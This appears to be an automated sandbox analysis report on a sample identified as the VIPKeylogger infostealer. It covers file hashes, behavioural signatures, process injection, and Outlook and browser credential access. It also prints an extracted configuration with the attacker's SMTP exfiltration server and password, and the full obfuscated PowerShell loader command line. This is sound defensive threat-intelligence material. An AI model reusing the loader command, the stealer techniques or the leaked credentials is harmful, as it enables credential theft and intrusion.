Analysis
-
max time kernel
119s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2024 05:27
Static task
static1
Behavioral task
behavioral1
Sample
48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe
Resource
win10v2004-20241007-en
General
-
Target
48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe
-
Size
1.0MB
-
MD5
a4272146962443a5d3795d2443268660
-
SHA1
c4b0dea3202c5e7fcb6d97a099b71be43c141066
-
SHA256
48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30
-
SHA512
f136c4e2d8d1b77ddc8cbe768c1a7d268bd9a415720b873c98aff2f3c7be441880dafc6b8897b9804891e055ccf1f2b522d762641a97f3811241f8d4d5caf0de
-
SSDEEP
24576:Ij+E5UmQgGxoeTKDCAJvxADGSifhNwmNG3Ap137dboaPjyMi76Kbi:Y+HmWxKDCA9fQt3IRM+i76t
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
JA-*2020antonio - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Loads dropped DLL 1 IoCs
pid Process 2228 Trense.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trense.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trense.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trense.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 drive.google.com 22 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2228 Trense.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3936 powershell.exe 2228 Trense.exe -
pid Process 3936 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trense.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 2228 Trense.exe 2228 Trense.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3936 powershell.exe Token: SeIncreaseQuotaPrivilege 3936 powershell.exe Token: SeSecurityPrivilege 3936 powershell.exe Token: SeTakeOwnershipPrivilege 3936 powershell.exe Token: SeLoadDriverPrivilege 3936 powershell.exe Token: SeSystemProfilePrivilege 3936 powershell.exe Token: SeSystemtimePrivilege 3936 powershell.exe Token: SeProfSingleProcessPrivilege 3936 powershell.exe Token: SeIncBasePriorityPrivilege 3936 powershell.exe Token: SeCreatePagefilePrivilege 3936 powershell.exe Token: SeBackupPrivilege 3936 powershell.exe Token: SeRestorePrivilege 3936 powershell.exe Token: SeShutdownPrivilege 3936 powershell.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeSystemEnvironmentPrivilege 3936 powershell.exe Token: SeRemoteShutdownPrivilege 3936 powershell.exe Token: SeUndockPrivilege 3936 powershell.exe Token: SeManageVolumePrivilege 3936 powershell.exe Token: 33 3936 powershell.exe Token: 34 3936 powershell.exe Token: 35 3936 powershell.exe Token: 36 3936 powershell.exe Token: SeDebugPrivilege 2228 Trense.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3932 wrote to memory of 3936 3932 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe 83 PID 3932 wrote to memory of 3936 3932 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe 83 PID 3932 wrote to memory of 3936 3932 48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe 83 PID 3936 wrote to memory of 2228 3936 powershell.exe 97 PID 3936 wrote to memory of 2228 3936 powershell.exe 97 PID 3936 wrote to memory of 2228 3936 powershell.exe 97 PID 3936 wrote to memory of 2228 3936 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trense.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trense.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe"C:\Users\Admin\AppData\Local\Temp\48db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30N.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Hollows=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\Polysulfonate\sangersken\Exposals.Kom196';$Cindersbanerne=$Hollows.SubString(58520,3);.$Cindersbanerne($Hollows)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Users\Admin\AppData\Local\Temp\Trense.exe"C:\Users\Admin\AppData\Local\Temp\Trense.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2228
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD5a4272146962443a5d3795d2443268660
SHA1c4b0dea3202c5e7fcb6d97a099b71be43c141066
SHA25648db01d4c24db50c1509fe5313929cda3adccf48b3436ef003bf65fc46a56e30
SHA512f136c4e2d8d1b77ddc8cbe768c1a7d268bd9a415720b873c98aff2f3c7be441880dafc6b8897b9804891e055ccf1f2b522d762641a97f3811241f8d4d5caf0de
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
66KB
MD5ff97d4b146a0a25a7d4a45aef84c1b21
SHA180c1f5c9c718527570082f12c8aafdb9057d3250
SHA2564fe0bada021f706a822f5d2854b42c382c60e8730003f04bc1ece22770f111a2
SHA512397cbd46aa10419ffcbadcde0ada5c5becfd915eb1b7b49591659f1613458e2b0614c0124f1296b214e41d85bd1359d2e714eceb71daa97f34d5ac5a988b1ad7
-
Filesize
338KB
MD5376cf7ed3ab67b8a7818ad3ebdea6f82
SHA180d19f5ccb69087491a705ed309b2bf4da08f979
SHA256b6b9bb1dbefdb53592f244f4928f67791ae51c6033520a30e5329307cf9a38c0
SHA512738b7587517192b357acad446493b07e1c160c4e956e77dcc7fc7a6d9971896cd772011bb37d7be91321a2e2143750125009ac4930cd92d0dac36037ff0bdbd9